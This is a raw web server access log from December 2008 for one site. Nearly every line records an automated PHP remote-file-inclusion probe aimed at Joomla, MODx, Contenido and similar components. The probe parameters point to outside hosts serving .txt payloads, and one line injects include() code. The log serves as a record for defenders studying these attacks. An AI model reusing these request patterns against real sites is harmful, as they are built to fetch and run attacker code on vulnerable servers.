84.21.71.133 - - [08/Dec/2008:10:16:59 -0800] "GET /logs/access_081125.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:17:00 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:17:00 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:00 -0800] "GET /logs/access_081031.log%20%20//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:00 -0800] "GET /logs/access_081014.log%20%20//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:06 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:06 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:07 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:12 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:12 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:12 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:10:17:13 -0800] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:17:14 -0800] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
87.106.246.45 - - [08/Dec/2008:10:17:21 -0800] "GET /logs/access_081126.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.118 - - [08/Dec/2008:10:17:41 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oao-avtodorstroy.ru/admin/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:44 -0800] "GET /logs/access_081014.log%20%20//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:44 -0800] "GET /logs/access_081031.log%20%20//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:48 -0800] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:17:50 -0800] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:17:52 -0800] "GET /logs/access_080525.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:17:55 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:17:55 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
209.135.140.145 - - [08/Dec/2008:10:18:11 -0800] "GET /logs/access_080525.log/components/errors.php?error=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.135.140.145 - - [08/Dec/2008:10:18:11 -0800] "GET /components/errors.php?error=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.135.140.145 - - [08/Dec/2008:10:18:11 -0800] "GET /logs/components/errors.php?error=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.135.140.145 - - [08/Dec/2008:10:18:36 -0800] "GET /logs/access_080201.log/components/errors.php?error=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.201.52.117 - - [08/Dec/2008:10:18:42 -0800] "GET /logs/access_081126.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:18:50 -0800] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
91.186.15.66 - - [08/Dec/2008:10:18:51 -0800] "GET /modules/vWar_Account/includes/get_header.php?vwar_root=http://www.momsbid.com/uploaded/includes/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
91.186.15.66 - - [08/Dec/2008:10:18:51 -0800] "GET /logs//modules/vWar_Account/includes/get_header.php?vwar_root=http://www.momsbid.com/uploaded/includes/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:10:18:53 -0800] "GET /logs/access_080522.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:10:18:58 -0800] "GET /logs/access_080524.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:19:03 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:19:03 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:19:06 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:19:14 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:19:14 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:19:14 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:19:24 -0800] "GET /logs/access_080523.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:19:24 -0800] "GET /logs/access_080522.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:19:52 -0800] "GET /logs/access_080503.log%20%20/index.php?language=http://www.longlakecamp.ca/guestbook//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.159.73.78 - - [08/Dec/2008:10:20:13 -0800] "GET /?path%5Bdocroot%5D=http://serv.roscan.net/idbut.txt??? HTTP/1.1" 200 94662 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.39.203 - - [08/Dec/2008:10:21:26 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csctillay.fr/UserFiles/Image/newid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.159.73.78 - - [08/Dec/2008:10:21:30 -0800] "GET /logs/access_081112.log//?path%5Bdocroot%5D=http://serv.roscan.net/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:21:30 -0800] "GET /logs/access_080509.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.159.73.78 - - [08/Dec/2008:10:21:31 -0800] "GET /?path%5Bdocroot%5D=http://serv.roscan.net/idbut.txt??? HTTP/1.1" 200 94678 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:21:32 -0800] "GET /logs/access_080509.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.159.73.78 - - [08/Dec/2008:10:21:33 -0800] "GET /logs//?path%5Bdocroot%5D=http://serv.roscan.net/idbut.txt??? HTTP/1.1" 200 77030 "-" "libwww-perl/5.805" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:21:36 -0800] "GET /logs/access_080522.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:21:36 -0800] "GET /logs/access_080523.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:21:37 -0800] "GET /logs/access_080228.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.211.24 - - [08/Dec/2008:10:21:39 -0800] "GET /logs/access_080720.log HTTP/1.1" 200 1900544 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:21:42 -0800] "GET /logs/access_080228.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:21:42 -0800] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:21:56 -0800] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:22:41 -0800] "GET /logs//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:22:41 -0800] "GET /modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:22:41 -0800] "GET /logs/access_080519.log//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:22:42 -0800] "GET /modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:22:42 -0800] "GET /logs/access_080519.log//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.133.193.50 - - [08/Dec/2008:10:22:42 -0800] "GET /administrator/components/com_virtuemart/classes/htmlTools.class.php?mosConfig_absolute_path=http://www.buycheaperwebhosting.com/biex/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:22:43 -0800] "GET /logs//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.135.140.145 - - [08/Dec/2008:10:22:53 -0800] "GET /logs/components/errors.php?error=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.135.140.145 - - [08/Dec/2008:10:22:53 -0800] "GET /components/errors.php?error=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:22:57 -0800] "GET /logs/access_081031.log%20%20//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:22:57 -0800] "GET /logs/access_081014.log%20%20//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:22:58 -0800] "GET /logs/access_081031.log%20%20//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:22:58 -0800] "GET /logs/access_081014.log%20%20//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:10:22:58 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:10:22:59 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:23:06 -0800] "GET /logs//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:23:06 -0800] "GET /modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:23:06 -0800] "GET /logs/access_080519.log//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:10:23:21 -0800] "GET /logs/access_080906.log/oneadmin/calendar/include.php?path[docroot]=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:10:23:21 -0800] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:10:23:49 -0800] "GET /logs/access_080509.log/oneadmin/calendar/include.php?path[docroot]=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:10:24:00 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:10:24:00 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:24:22 -0800] "GET /logs/access_080401.log%20%20/db.php?path_local=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:24:22 -0800] "GET /logs/access_080828.log%20%20/db.php?path_local=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:24:22 -0800] "GET /logs/db.php?path_local=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:10:24:30 -0800] "GET /logs/access_080401.log//bbs//skin/zero_vote/ask_password.php?dir=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:10:24:30 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:10:24:30 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:10:24:34 -0800] "GET /logs/access_081029.log//bbs//skin/zero_vote/ask_password.php?dir=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:10:24:45 -0800] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:24:48 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:24:48 -0800] "GET /logs/access_080828.log/db.php?path_local=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:24:48 -0800] "GET /logs/access_080401.log/db.php?path_local=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:24:49 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:10:24:58 -0800] "GET /logs/db.php?path_local=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:10:24:59 -0800] "GET /db.php?path_local=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.159.73.78 - - [08/Dec/2008:10:25:12 -0800] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://serv.roscan.net/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:25:33 -0800] "GET /logs/access_080228.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:25:34 -0800] "GET /logs/access_080228.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.236.88.58 - - [08/Dec/2008:10:25:44 -0800] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:25:49 -0800] "GET /logs/access_081024.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:25:50 -0800] "GET /logs/access_081024.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.208.252 - - [08/Dec/2008:10:25:53 -0800] "GET /logs/access_080228.log//skin/zero_vote/error.php?dir=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
124.0.208.252 - - [08/Dec/2008:10:25:53 -0800] "GET /logs/access_080228.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//skin/zero_vote/error.php?dir=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:26:47 -0800] "GET /logs/access_080303.log/db.php?path_local=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:26:47 -0800] "GET /logs/access_080404.log/db.php?path_local=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.236.88.58 - - [08/Dec/2008:10:28:06 -0800] "GET /logs/access_081016.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.236.88.58 - - [08/Dec/2008:10:28:09 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.236.88.58 - - [08/Dec/2008:10:28:12 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:28:22 -0800] "GET /logs/access_080408.log//agendax/addevent.inc.php?agendax_path=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:28:22 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:28:22 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
